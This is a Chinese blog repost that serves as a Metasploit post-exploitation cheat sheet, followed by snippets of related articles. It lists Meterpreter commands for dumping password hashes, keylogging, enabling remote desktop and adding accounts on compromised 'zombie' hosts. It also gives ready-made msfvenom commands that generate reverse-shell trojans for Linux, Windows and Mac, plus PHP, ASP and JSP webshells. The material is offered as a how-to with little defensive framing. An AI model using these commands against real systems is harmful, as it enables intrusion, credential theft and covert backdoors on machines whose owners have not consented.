[后渗透]Metasploit使用基础

最新推荐文章于 2022-09-05 10:35:33 发布
最新推荐文章于 2022-09-05 10:35:33 发布
阅读量213 收藏
点赞数
文章标签: shell php 数据库
原文链接:http://www.cnblogs.com/-mo-/p/11273563.html
版权

目录

0x00 简介

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

0x01 配置MSF的数据库

首先配置下MSF的数据库:可提升查询攻击模块的速度,以及利用速度
1.1 进入到msf,查询数据库连接情况:发现默认情况下并未连接数据库

$msf> db_status

1561366-20190730235440957-2078673979.png

1.2 配置数据库:

$service postgres enable
$service postgres start
$msfdb init

1561366-20190730235602784-1535442815.png

1.3 看到上面的配置文件的提示,就可以通过文件地址,查看连接密码:

$cat /usr/share/metasploit-framework/config/database.yml

1.4 知道密码后,再次进入msf,通过db_connect 查询如何写连接的命令:
1561366-20190730235404727-1970366591.png

1.5 再用用账号密码去连,最后db_stause查询下状态,发现连接正常
1561366-20190730235354517-1515946936.png

0x02 MSF模块分类

MSF的命名规则:模块/系统/服务/名称

MSF的模块,也就是我们看到的众多利用模块最前面的分类,主要有以下6个模块

- exploits(漏洞攻击模块列表,入侵式)
- payloads(漏洞负载模块,入侵要做什么) 
- auxiliary(辅助模块,一般是没有攻击载荷的漏洞攻击) 
- encoders(编码器模块 用于msfvenom -e or msf执行时也能用的 指的是shellcode的编码) 
- nops(无操作生成器模块) 
- post(开发模块)

0x03 MSF使用流程

- 1.search name(查询相关漏洞编号)
- 2.use exploits(使用模块)
- 3.show options(攻击前设置变量)
- 4.set payload(设置payload)
- 5.exploit/run(运行)

0x04 MSF常用指令

1561366-20190730235811950-1903420532.png

除上面之外,再加上一个:unset 清空已经设置好的参数内容

0x05 Payload的类型

- _find_tag:在一个已建立的连接上 
- _reverse_tcp:反向连接到攻击者主机 
- bind_tcp:监听一个tcp连接 
- reverse_http:通过HTTP隧道反向连接

0x06 exploit/run的参数

-e <opt>  要使用的有效载荷编码器。如果没有指定,则使用编码器。    
-f        强制开发漏洞,而不考虑极小值的大小。    
-h        帮助     
-j        后台运行。。     
-n <opt>  使用NOP发生器。如果没有指定,则使用NOP。     
-o <opt>  在VAR= VALL格式中的逗号分隔选项列表。     
-p <opt>  使用的有效载荷。如果没有指定,则使用有效载荷。     
-t <opt>  要使用的目标索引或名称。如果没有指定,则使用目标。     
-z        在成功开发后不与会话交互。

0x07 一些操作指令

sessions    查看所有肉鸡列表
session -l   查看肉鸡在线列表 
exploit   执行渗透攻击或模块来攻击目标。 
sessions -i 1     打开建立的第一个会话 
getuid     查看UID 
sysinfo     查看攻击主机的系统信息 
run hashdump     dump目标主机的hash帐号信息,备份进行暴破 
ps  查看目标主机进程 
migrate 1576(pid)     切换自己为管理员,1576是管理员的进程ID 
keyscan_start    开启健盘记录功能 
keyscan_dump     查看健盘记录信息 
keyscan_stop     停止健盘记录 
run getgui -e     远程开启目标主机的远程桌面 
run getgui -u cisco -p cisco      远程添加目标主机帐号密码 
rdesktop 192.168.1.100     连接远程桌面

0x08 MSF生成木马

8.1 List payloads:

msfvenom -l

8.2 系统型木马:

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

8.3 网页型木马

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

0x09 MSF提权

查询提权模块:

search exploit/windos/local

会列举出所有可用提权模块

通过use使用模块使用后,再设置payload,或通过修改已存在的session会话,进行使用。

转载于:https://www.cnblogs.com/-mo-/p/11273563.html

baguangman5501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透Metasploit Framework基础知识
12-28
Metasploit Framework基础知识
ctf之:kali-linux-2022-W48:metasploit启动
viviliving的专栏
12-09 1357
网上说是kali2.0里面没这个命令了,初始化就可以使用,没初始化的情况如下。初始化后的如下,应该初始化的,这工具没用过,上面的不对。查看postgresql的密码,我以为是加密的其实那就是密码。
08、Metasploit渗透测试之信息收集
山兔的博客
09-05 742
一个好的渗透测试,是要把信息收集给完全了,不要他给你一个主站,你就光打一个主站,这样就没得玩了,这么多的协议收集,不指定开那个,万一开了ssh协议,我们可以利用一下,有没有相关漏洞,比如开了snmp或者开了TCP,都可以去扫一扫,尽可能详细的信息收集,才能有利于你们接下来漏洞利用,如何去发现这个漏洞,有版本出现那个漏洞、验证漏洞,扫描漏洞,然后利用这个漏洞去攻击,处理后事。像这种大规模的暴力破解,早就被发现了,这要是一个服务器,被这样强行的打、测试,早就开始拉警报了,封IP都是小事,开始溯源了。
metasploit小白教程总结
sweetie 的博客
01-03 2335
msf小白学习教程一 1.msf是什么? msf全称:metasplpit 作用Metasploit是一个渗透测试平台 环境:kali-linux 自动搭建了msf环境 2.msf的详细分解 在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。 2.1搜索模块 首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。 2.1.1 搜索模块命令:search 命令介绍:msfconsole
Metasploit 基本使用方法
qq_45541451的博客
11-23 1480
Metasploit 基本使用方法 1.手动启动数据库 systemctl start postgresql systemctl enable postgresql 2.第二种使用终端命令 msfconsole help Core Commands #核心命令 Module Commands #模块命令 Job Commands #后台任务命令 Resource Script Commands #资源脚本命令 Database Backend Commands #数据库后端命令 Credentials Ba
metasploit的模块构成及功能分析
xysoul的专栏
04-07 1万+
metasploit的模块构成及功能分析 今天我们介绍一下metasploit基础架构和 市面上介绍metasploit的书不少,网上metasploit使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。 exploit@ubuntu:/pentest/f
Metasploit 基础知识
08-17
Metasploit 基础知识
Metasploit 学习 指南— 基础
12-23
Author:阿德马 ...Metasploit 是一款强大的渗透测试平台,其包括了很多渗透测试利器,本文简单介绍一下 Metasploit 的配置和基础使用方法,主要包括以下几个方面: 网上朋友总结的,在此谢过!讲述kali linux
Metasploit Framework基础介绍及下载
12-06
Metasploit Framework (MSF)是 2003 年以开放源代码方式发布、可自由获取的开发 框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。2.x 框 架主要是由面向对象的 Perl 编程语言编写的,最新...
[网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及防御机理
杨秀璋的专栏
02-26 6075
本文是“网络安全提高篇”第二篇文章,将带领大家了解Metasploit技术,并结合作者之前的漏洞利用及WannaCry逆向经验总结。同时本文学习了徐焱老师他们的《Web安全攻防渗透测试实战指南》,在此感谢。具体内容包括:一.Metasploit简介 二.Metasploit基础普及 1.专业术语 2.渗透步骤及攻击链 三.主机扫描 1.使用辅助模块进行端口扫描 2.使用辅助模块进行服务扫描 3.使用Nmap扫描 四.漏洞利用之MS17-010案例 1.背景知识 2.漏洞利用复现 3.防御措施
msf生成php,使用msfpayload生成后门(asp,aspx,php,jsp,exe)等
weixin_39752941的博客
03-10 740
msfpayload与msfencode参数说明执行msfpayload -h查看都有哪些参数执行msfencode -h查看都有哪些参数生成backdoor类型可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.msfpayload生成linux backdoor目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试...
Metasploit渗透
一个码农的笔记
01-31 4167
Metasploit渗透 在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell 首先用Metasploit生成反弹马,也就是生成反弹的payload: 成功生成反弹型payload: (1)生成win下的exe msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp L
CTF学习
code_lab
12-19 3666
转载于百度贴吧http://tieba.baidu.com/p/3933947157?see_lz=1&pn=1 CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
渗透、攻防、CTF、编程
10-12 3429
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
Metasploit – 内网连接
weixin_30654583的博客
01-07 179
0x00 问题描述 在渗透测试时,metasploit往往作为后渗透工具,(因为远程溢出越来越少).我一般都是在获得一个webshell后,来使用metasploit进行信息采集,或者内网扫描等操作。而大多数站点都是内网ip。而本屌丝自己的机器也是内网ip,那么两个内网ip怎么建立连接? 0x01 解决办法 以前总是使用lcx做端口转发连接站点的3389,是否也可以用lcx...
CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 1842
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其的敏感目录进行查看 其/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码存储了常用的密码 其/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
MSF简单的使用教程
Bul1et的博客
10-24 9775
Kali自带MSF工具 假如此时nessus扫到了主机漏洞  比如ms.... 启动msf msfconsole 2.secrch ms模块 找到模块  使用模块 查看模块需要的命令   ip或者端口 使用set命令进行设置  ip或者端口 然后使用run命令  开始验证 ...
Metasploit入门用法(主动攻击)
热门推荐
shark-CV的博客
06-03 8万+
Metasploit入门用法(主动攻击) –作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。
metasploit 使用教程
最新发布
09-01
2. 了解基础知识:在使用Metasploit之前,建议你对网络协议、漏洞利用和渗透测试等基础知识有一定的了解。这将帮助你更好地理解和使用Metasploit。 3. 启动Metasploit:安装完成后,你可以通过命令行或者图形界面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值